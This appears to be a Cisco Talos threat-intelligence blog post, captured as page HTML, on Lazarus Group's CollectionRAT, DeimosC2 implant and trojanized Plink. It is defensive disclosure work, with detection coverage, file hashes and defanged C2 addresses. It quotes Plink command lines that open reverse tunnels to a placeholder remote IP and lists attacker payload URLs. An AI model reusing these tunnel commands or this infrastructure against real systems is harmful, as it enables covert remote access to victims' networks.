                            <g>
                                <circle fill="#FFFFFF" cx="24.083" cy="16.068" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="23.875" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="31.682" r="2.496"></circle>
                            </g>
                        </svg>
                    </label>
                    <ul class="sub-nav">
                        <li class="desktop-hide">
                            <a href="https://talosintelligence.com/podcasts">
                                <h4>Podcasts</h4>
                            </a>
                        </li>
                        <li class="desktop-hide">
                            <label class="subnav-back-button" for="podcast-sub-trigger">BACK</label>
                        </li>
                        <li><a href="https://talosintelligence.com/podcasts/shows/beers_with_talos">Beers with Talos</a></li>
                        <li><a href="https://talosintelligence.com/podcasts/shows/talos_takes">Talos Takes</a></li>
                    </ul>
                    <div class="desktop-hide subnav-overlay">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="podcast-icon-nav" x="0px" y="0px" viewBox="0 0 71.8 75" width="26px" height="20px" style="enable-background:new 0 0 71.8 75;" xml:space="preserve">
                            <style type="text/css">
                                .podcast-fill{fill:#fff;}
                            </style>
                            <path class="podcast-fill" d="M21.8,15.1c0-7.8,6.3-14.1,14.1-14.1c7.8,0,14.1,6.3,14.1,14.1v25.4c0,7.8-6.3,14.1-14.1,14.1  c-7.8,0-14.1-6.3-14.1-14.1V15.1z M59.9,40.1c0,12.4-9.4,22.6-21.5,23.9v3.6h12.8c1.4,0,2.6,1.2,2.6,2.6c0,1.4-1.2,2.6-2.6,2.6H20.4  c-1.4,0-2.6-1.2-2.6-2.6c0-1.4,1.2-2.6,2.6-2.6h12.8V64c-12-1.3-21.5-11.5-21.5-23.9v-6.8c0-1.4,1.2-2.6,2.6-2.6  c1.4,0,2.6,1.2,2.6,2.6v6.8c0,10.4,8.5,18.8,18.8,18.8c10.4,0,18.8-8.5,18.8-18.9v-6.8c0-1.4,1.2-2.6,2.6-2.6c1.4,0,2.6,1.2,2.6,2.6  V40.1z"></path>
                        </svg>
                    </div>
                </li>

                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/about">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="55px" height="55px" viewBox="0 0 55 55">
                            <g>
                                <g class="mobile-nav-home">
                                    <path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M45.201,12.343c0.378,0.48,0.758,0.925,1.096,1.401    c2.975,4.207,4.543,8.876,4.494,14.044c-0.05,5.452-1.643,10.386-5.186,14.593c-3.484,4.133-7.929,6.73-13.182,7.895    c-6.313,1.398-12.216,0.275-17.695-3.131c-0.441-0.273-0.847-0.6-1.266-0.904c-0.11-0.078-0.208-0.174-0.337-0.287    c0.127-0.141,0.246-0.27,0.366-0.398c0.887-0.949,1.765-1.904,2.663-2.844c0.114-0.119,0.321-0.217,0.485-0.217    c3.658-0.006,7.318,0,10.975,0.008c3.458,0.006,6.913,0.02,10.369,0.02c0.957,0,1.871-0.193,2.62-0.844    c0.797-0.693,1.157-1.596,1.157-2.643c0.001-7.533,0.003-15.067-0.005-22.601c-0.002-0.309,0.088-0.524,0.3-0.743    C43.098,14.598,44.127,13.49,45.201,12.343"></path>
                                    <path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M41.402,8.822c-0.99,1.027-1.994,2.021-2.935,3.072    c-0.312,0.35-0.616,0.416-1.036,0.415c-6.98-0.009-13.957-0.007-20.938-0.007c-2.039,0-3.561,1.514-3.561,3.557    c0,6.504,0.002,13.008,0.006,19.512c0.002,0.973,0.011,1.943,0.004,2.914c0,0.133-0.04,0.301-0.127,0.393    c-1.069,1.162-2.15,2.314-3.229,3.469c-0.021,0.023-0.052,0.039-0.109,0.08c-0.159-0.188-0.323-0.369-0.471-0.562    c-2.535-3.348-4.119-7.102-4.605-11.268c-0.61-5.229,0.194-10.229,2.835-14.839c2.669-4.664,6.655-7.805,11.618-9.75    c3.205-1.257,6.533-1.852,9.977-1.621c4.478,0.298,8.553,1.754,12.227,4.325c0.101,0.072,0.197,0.151,0.291,0.229    C41.364,8.755,41.374,8.778,41.402,8.822"></path>
                                    <path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M39.799,12.47c0.873-0.911,1.749-1.829,2.676-2.797    c0.605,0.564,1.195,1.112,1.816,1.691c-0.941,0.985-1.817,1.903-2.703,2.83c-0.276-0.339-0.511-0.688-0.807-0.975    C40.492,12.941,40.145,12.728,39.799,12.47"></path>
                                    <path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M10.35,43.279c0.969-1.016,1.885-1.977,2.76-2.893    c0.213,0.369,0.376,0.762,0.639,1.072c0.265,0.312,0.627,0.539,0.98,0.832c-0.853,0.891-1.713,1.791-2.624,2.746    C11.513,44.445,10.939,43.869,10.35,43.279"></path>
                                </g>
                            </g>
                        </svg>
                        <span>About</span>
                    </a>
                </li>
                <li class="nav-item desktop-hide">
                    <button class="search-button" data-ghost-search><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2"><path stroke-linecap="round" stroke-linejoin="round" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z"></path></svg> <span>Search Blog</span></button>
                </li>
            </ul>
        </div>
        <div class="nav-search-wrapper">
            <button class="search-button" data-ghost-search><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2"><path stroke-linecap="round" stroke-linejoin="round" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z"></path></svg></button>
        </div>
    </div>
</nav>
    

    <main id="site-main">
        <div class="container-fluid">
            <div class="row main-content-row">
                <div class="col post-full-content">
                    
<article class="post tag-threats tag-securex-3 tag-landing-page-top-story tag-top-story featured ">
        <div class="feature-image-wrapper my-5">
            <figure>
                <img src="/content/images/2023/08/lazarus-group-1.jpg" alt="" class="img-fluid" />
            </figure>
        </div>

    <h1 class="text-center">Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware</h1>

    <div class="text-center m-1">
        <div class="post-author">
            <span>By </span>
                <a href="https://blog.talosintelligence.com/author/asheer-malhotra/">Asheer Malhotra</a>, 
                <a href="https://blog.talosintelligence.com/author/vitor-ventura/">Vitor Ventura</a>, 
                <a href="https://blog.talosintelligence.com/author/jungsoo/">Jungsoo An</a>
        </div>

        <br/>
        <time class="post-datetime" datetime="August 24, 2023 08:08">
            Thursday, August 24, 2023 08:08
        </time>

        <div class="m-3">
                            <a href="/category/threats/" class="category primary-category">
                                Threats
                            </a>
                                                    <a href="/category/securex-3/" class="category primary-category">
                                SecureX
                            </a>
                                </div>
    </div>

    <section class="post-content-wrapper mt-5">
        <div class="post-content">
            <ul><li>In the Lazarus Group’s latest campaign, which we detailed in a <a href="https://blog.talosintelligence.com/lazarus-quiterat/">recent blog</a>, the North Korean state-sponsored actor is exploiting <a href="https://nvd.nist.gov/vuln/detail/cve-2022-47966">CVE-2022-47966</a>, a ManageEngine ServiceDesk vulnerability to deploy multiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called “CollectionRAT.”<br></li><li>CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to <a href="https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499">Jupiter</a>/<a href="https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/">EarlyRAT</a>, another malware family Kaspersky recently wrote about and attributed to <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/silent_chollima">Andariel</a>, a subgroup within the Lazarus Group umbrella of threat actors.<br></li><li>Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase. <br></li><li>One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.</li></ul><h1 id="lazarus-group-reuses-infrastructure-in-continuous-assault-on-enterprises">Lazarus Group reuses infrastructure in continuous assault on enterprises</h1><p>In the new Lazarus Group campaign we recently disclosed, the <a href="https://www.cisa.gov/uscert/northkorea">North Korean state-sponsored </a>actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.</p><p>As mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, <a href="https://blog.talosintelligence.com/lazarus-three-rats/">Talos published details of a Lazarus Group campaign</a> targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of <a href="https://blog.talosintelligence.com/apache-log4j-rce-vulnerability/">the Log4j vulnerability</a>, heavily employed a previously unknown implant we called “<a href="https://blog.talosintelligence.com/lazarus-magicrat/">MagicRAT</a>,” along with known malware families <a href="https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html">VSingle</a>, <a href="https://blogs.jpcert.or.jp/en/2022/07/yamabot.html">YamaBot</a> and <a href="https://www.boho.or.kr/krcert/publicationView.do?bulletin_writing_sequence=36276">TigerRAT</a>, all of which were previously attributed to the threat actor by Japanese and Korean government agencies. </p><p>Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by <a href="https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf">WithSecure</a>. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, -known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier to deploy malicious implant based on its size.</p><figure class="kg-card kg-image-card"><img src="https://lh3.googleusercontent.com/0knNqa58yI-TPNceZf7WZLG4Rvfr6emgpGrOmCUvHAmzgv2HoQ7KGdmQ9YCwhAt-mH6ZQ6pD1a6MQoYleMF0EJ8ArQP4WFcCppcwGCZgzV9jleiFXKzDyM0cspeuDaapxmBFzEYuXRAIoN3KN6JGsqU" class="kg-image" alt loading="lazy" width="624" height="380"></figure><p><br>In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their <a href="https://blog.talosintelligence.com/lazarus-three-rats/">preceding campaign</a> from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. <a href="https://blog.talosintelligence.com/lazarus-three-rats/">Lazarus has been known</a> to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.</p><p>Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as <a href="https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499">Jupiter</a>/<a href="https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/">EarlyRAT</a> (also from 2021), a malware family listed in CISA’s advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a">detailing recent North Korean ransomware activity</a>.</p><p>The connections between the various malware are depicted below:</p><figure class="kg-card kg-image-card"><img src="https://lh3.googleusercontent.com/Sgs0ezangb-hD4iNypVdBBrT9G6y8DklykW9hf0rixJdtQz-hPBKyWwcCSsMRyF2wLwihRmOGD7G9BMlvbNE07BDp-UUAOtFOnZaz2cQTbVaOpQiayyynWdRSoXTM-CwO58fta81RsU2Lge_rVbnjJ0" class="kg-image" alt loading="lazy" width="624" height="443"></figure><h1 id="lazarus-evolves-malicious-arsenal-with-collectionrat-and-deimosc2">Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2</h1><p>CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code. </p><p>CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh3.googleusercontent.com/8Ai5b0p0xLBPrUWIPj7cH-Eepy0quNA5TDTMeQtPdV787UnXr2tPyIDvD7bZxFwGMSoxABmv7J2OBvjQ9QwZPmTe3uZ_sep8GQBDJbi7_BPbdQ7S0Phni8dycbtGvQjoE9bKVfkRfvDqfQa3hmSCh3M" class="kg-image" alt loading="lazy" width="624" height="763"><figcaption>Implant's configuration strings.</figcaption></figure><p>The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh5.googleusercontent.com/dJy5tYazxoNvrfrN5jBrZcOAGPg1uiQtPy0iE_VfQsSkqX5KfUYLLLoK4u949TvXkIk2HbKxBbgTSKyFVhbWXvpe6GoIfsvgwWnpMrIDlG4_uyeP0cbWIfq40tkZDvSLy9NpAkDi9UQ3L25HwAjoq00" class="kg-image" alt loading="lazy" width="624" height="111"><figcaption>Initial check-in over HTTP to C2 server.</figcaption></figure><h3 id="collectionrat-and-its-link-to-earlyrat">CollectionRAT and its link to EarlyRAT</h3><p>Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to <a href="https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/">EarlyRAT</a>, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a">CISA’s advisory</a> from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. <a href="https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499">DCSO CyTec’s blog</a> contains more details about Jupiter.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh4.googleusercontent.com/I2X7uvkyIQP-HWZvEox_QMupReSh1CvKM93DZ3UnL1E_GqRvBCTovAYlRhnc_RilV8TlLk1pfmoQwkcjRaQbZgJeAJk1DmLtu_WyUBkMma-Wrb9DDrT43b-E6YjAggU19ukcs5_tziG-n7H0DbB2sPU" class="kg-image" alt loading="lazy" width="624" height="601"><figcaption>Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT</figcaption></figure><h2 id="adoption-of-open-source-tools-during-initial-access-%E2%80%94-deimosc2">Adoption of open source tools during initial access — DeimosC2</h2><p>Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools,, credential-dumping tools such as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as <a href="https://www.cobaltstrike.com/">Cobalt Strike</a> and <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver">Sliver</a>.</p><h3 id="deimosc2-analysis">DeimosC2 analysis</h3><p>Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.</p><p>The implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to and adopting the framework to their needs.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh6.googleusercontent.com/UTg9wkiNl0X7B7SxESBikyhYckBxi5jXzGYM43EcCgfzQfJuyg_emXeFPQ7xr72Yam6Daip7l950jWaWF2pzy_U2-9r5R6HK8ZvBUelctZ-EAlIjlyMh_7SNf8pvMYKYuL8hHimyDjw8NAr1jRq_wMQ" class="kg-image" alt loading="lazy" width="438" height="436"><figcaption>Configuration in the DeimosC2 implant.</figcaption></figure><p><a href="https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html">Trend Micro has an excelelnt analysis</a> of the DeimosC2, but the implants typically have various RAT capabilities such as:</p><ul><li>Execute arbitrary commands on the endpoint.</li><li>Credential stealing and registry dumping.</li><li>Download and upload files from C2.</li><li>Shellcode execution.</li><li>Uninstallation of the implant.</li></ul><h2 id="malicious-plink">Malicious Plink</h2><p>Another open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish remote tunnel using commands such as:</p><p><code>pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] &lt;Remote_IP&gt;</code></p><p>The option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.</p><p>However, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. The following figure shows a comparison of:</p><ul><li>The malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:</li></ul><p><code>Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username]-pw [password] &lt;Remote_IP&gt;</code></p><ul><li>A benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh5.googleusercontent.com/axenp8FJn8YsIOt75-dEBbu9Yf5W4-yab01M8BPw3o_jOAWbwQWkAzQ1N7Mp2muOzBQos8ETrDS7tIutWqXyp5KFKc9g701ob7D0nhXBEGnnbLBJa0w9dhHtKepZ42EGmE6KNdLfrZuS9SQA9h0W55M" class="kg-image" alt loading="lazy" width="624" height="479"><figcaption>A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.</figcaption></figure><p>The malicious Plink will also create a mutex named “Global\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.</p><h1 id="coverage">Coverage</h1><p>Ways our customers can detect and block this threat are listed below.</p><figure class="kg-card kg-image-card"><img src="https://lh6.googleusercontent.com/K2rcDymAOE1OBOMZJbq5R71N74IkefvDAoOhi2U-0xMhD1EkXieWe7Q0vHCX6f-e_pyaCLQfjjjLuMhREonMG-sME0TQ1fXu-jpc6g5zd0T1R02n2gi7v-N3J1Huq8f_uYDLcsnOsV3a5yNZWMQBaFw" class="kg-image" alt loading="lazy" width="624" height="127"></figure><p><a href="https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html">Cisco Secure Endpoint</a> (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free <a href="https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium=web-referral?utm_source=cisco&amp;utm_campaign=amp-free-trial&amp;utm_term=pgm-talos-trial&amp;utm_content=amp-free-trial">here.</a></p><p><a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Cisco Secure Web Appliance</a> web scanning prevents access to malicious websites and detects malware used in these attacks.</p><p><a href="https://www.cisco.com/c/en/us/products/security/email-security/index.html">Cisco Secure Email</a> (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free <a href="https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium=web-referral&amp;utm_source=cisco&amp;utm_campaign=cmd-free-trial-request&amp;utm_term=pgm-talos-trial">here</a>.</p><p><a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">Cisco Secure Firewall</a> (formerly Next-Generation Firewall and Firepower NGFW) appliances such as <a href="https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html">Threat Defense Virtual</a>, <a href="https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html">Adaptive Security Appliance</a> and <a href="https://meraki.cisco.com/products/appliances">Meraki MX</a> can detect malicious activity associated with this threat.</p><p><a href="https://www.cisco.com/c/en/us/products/security/threat-grid/index.html">Cisco Secure Malware Analytics</a> (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.</p><p><a href="https://umbrella.cisco.com/">Umbrella</a>, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella <a href="https://signup.umbrella.com/?utm_medium=web-referral?utm_source=cisco&amp;utm_campaign=umbrella-free-trial&amp;utm_term=pgm-talos-trial&amp;utm_content=automated-free-trial">here</a>.</p><p><a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Cisco Secure Web Appliance</a> (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.</p><p>Additional protections with context to your specific environment and threat data are available from the <a href="https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html">Firewall Management Center</a>.</p><p><a href="https://signup.duo.com/?utm_source=talos&amp;utm_medium=referral&amp;utm_campaign=duo-free-trial">Cisco Duo</a> provides multi-factor authentication for users to ensure only those authorized are accessing your network.</p><p>Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>. Snort SIDs for this threat: <strong>62248, 62253-62255.</strong></p><h1 id="iocs">IOCs</h1><p>IOCs for this research can also be found in our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/tree/main/2023/08">here</a>.</p><h2 id="hashes">Hashes<br></h2><h3 id="quiterat">QuiteRAT</h3><p>ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6<br></p><h3 id="collectionrat">CollectionRAT</h3><p>db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984</p><p>773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df<br></p><h3 id="deimosc2">DeimosC2</h3><p>05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d<br></p><h3 id="trojanized-plink">Trojanized Plink</h3><p>e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe</p><h2 id="networks-iocs">Networks IOCs<br></h2><p>146[.]4[.]21[.]94</p><p>109[.]248[.]150[.]13</p><p>108[.]61[.]186[.]55:443</p><p>hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat</p><p>hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php</p><p>hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php</p><p>hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php</p><p>hxxp[://]109[.]248[.]150[.]13/EsaFin[.]exe</p><p>hxxp[://]146[.]4[.]21[.]94/boards/boardindex[.]php</p><p>hxxp[://]146[.]4[.]21[.]94/editor/common/cmod</p>
        </div>
    </section>
    <div class="social-media-wrapper">
    <h5>Share this post</h5>
    <ul class="social-media-share-list">
        <li>
            <a class="share-facebook" title="Share this on Facebook" data-text="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware" data-href="https://blog.talosintelligence.com/lazarus-collectionrat/" rel="nofollow" target="_blank" href="https://www.facebook.com/sharer.php?u=https://blog.talosintelligence.com/lazarus-collectionrat/"></a>
        </li>
        <li>
            <a class="share-twitter" title="Tweet This" data-text="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware" data-href="https://blog.talosintelligence.com/lazarus-collectionrat/" rel="nofollow" target="_blank" href="https://twitter.com/share?url=https://blog.talosintelligence.com/lazarus-collectionrat/"></a>
        </li>
        <li>
            <a class="share-linkedin" title="Share this on LinkedIn" data-text="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware" data-href="https://blog.talosintelligence.com/lazarus-collectionrat/" rel="nofollow" target="_blank" href="https://www.linkedin.com/sharing/share-offsite/?url=https://blog.talosintelligence.com/lazarus-collectionrat/"></a>
        </li>
        <li>
            <a class="share-reddit" title="Reddit This" data-text="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware" data-href="https://blog.talosintelligence.com/lazarus-collectionrat/" rel="nofollow" target="_blank" href="https://www.reddit/submit?url=https://blog.talosintelligence.com/lazarus-collectionrat/"></a>
        </li>
        <li>
            <a class="share-email" title="Email This" href="mailto:?body=Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malwarehttps://blog.talosintelligence.com/lazarus-collectionrat/"></a>
        </li>
    </ul>
</div></article>
                </div>
                <div class="col-lg alt-layout-row-dk sidebar" id="side-bar">
                            <h4>Related Content</h4>

                                <div class="sidebar-snippet-wrapper">
                                    <a href="/lazarus-quiterat/">
                                        <h3>Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT</h3>
                                        <span  class="preview-attributes">August 24, 2023 08:08</span>
                                        <p>This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.</p>
                                    </a>
                                </div>
                                <div class="sidebar-snippet-wrapper">
                                    <a href="/new-threat-actor-using-yashma-ransomware/">
                                        <h3>New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware</h3>
                                        <span  class="preview-attributes">August 7, 2023 08:08</span>
                                        <p>Cisco Talos discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that began at least as early as June 4, 2023 with customized Yashma ransomware.</p>
                                    </a>
                                </div>
                                <div class="sidebar-snippet-wrapper">
                                    <a href="/malicious-campaigns-target-entities-in-ukraine-poland/">
                                        <h3>Malicious campaigns target government, military and civilian entities in Ukraine, Poland</h3>
                                        <span  class="preview-attributes">July 13, 2023 06:07</span>
                                        <p>Cisco Talos has discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. We judge that these operations are very likely aimed at stealing information and gaining persistent remote access.</p>
                                    </a>
                                </div>
                </div>
            </div>
        </div>
    </main>


    <footer id="footer">
    <div class="container-fluid">
        <div class="row footer_nav_wrapper">
            <div class="col-lg-10 col-md-9 col-sm-12">
                <div class="multi-col-list-wrapper">
                    <ul>
                        <li>
                            <a href="https://talosintelligence.com/software">Software</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/reputation_center">Reputation Center</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/vulnerability_info">Vulnerability Inforamtion</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/ms_advisories">Microsoft Advisory Snort Rules</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/incident_response">Incident Response</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/amp-naming">Secure Endpoint Naming Conventions</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/talos_file_reputation">Talos File Reputation</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/resources">Library</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/community">Support Communities</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/about">About</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/careers">Careers</a>
                        </li>
                        <li>
                            <a href="https://blog.talosintelligence.com">Talos Blog</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/newsletters">Threat Source newsletters</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/podcasts/shows/beers_with_talos">Beers with Talos Podcast</a>
                        </li>
                        <li>
                            <a href="https://talosintelligence.com/podcasts/shows/talos_takes">Talos Takes Podcast</a>
                        </li>
                    </ul>
                </div>
            </div>
            <div class="col-lg-2 col-md-3 col-sm-12 connect_social">
                <h5>Connect with us</h5>
                <ul>
                    <li>
                        <a target="_blank" href="https://twitter.com/talossecurity" rel="nofollow">
                            <img alt="Follow us on Twitter" src="https://blog.talosintelligence.com/assets/images/footer_icon_tw.svg?v=007426292d"/>
                        </a>
                    </li>
                    <li>
                        <a target="_blank" href="https://www.youtube.com/channel/UCPZ1DtzQkStYBSG3GTNoyfg/featured" rel="nofollow">
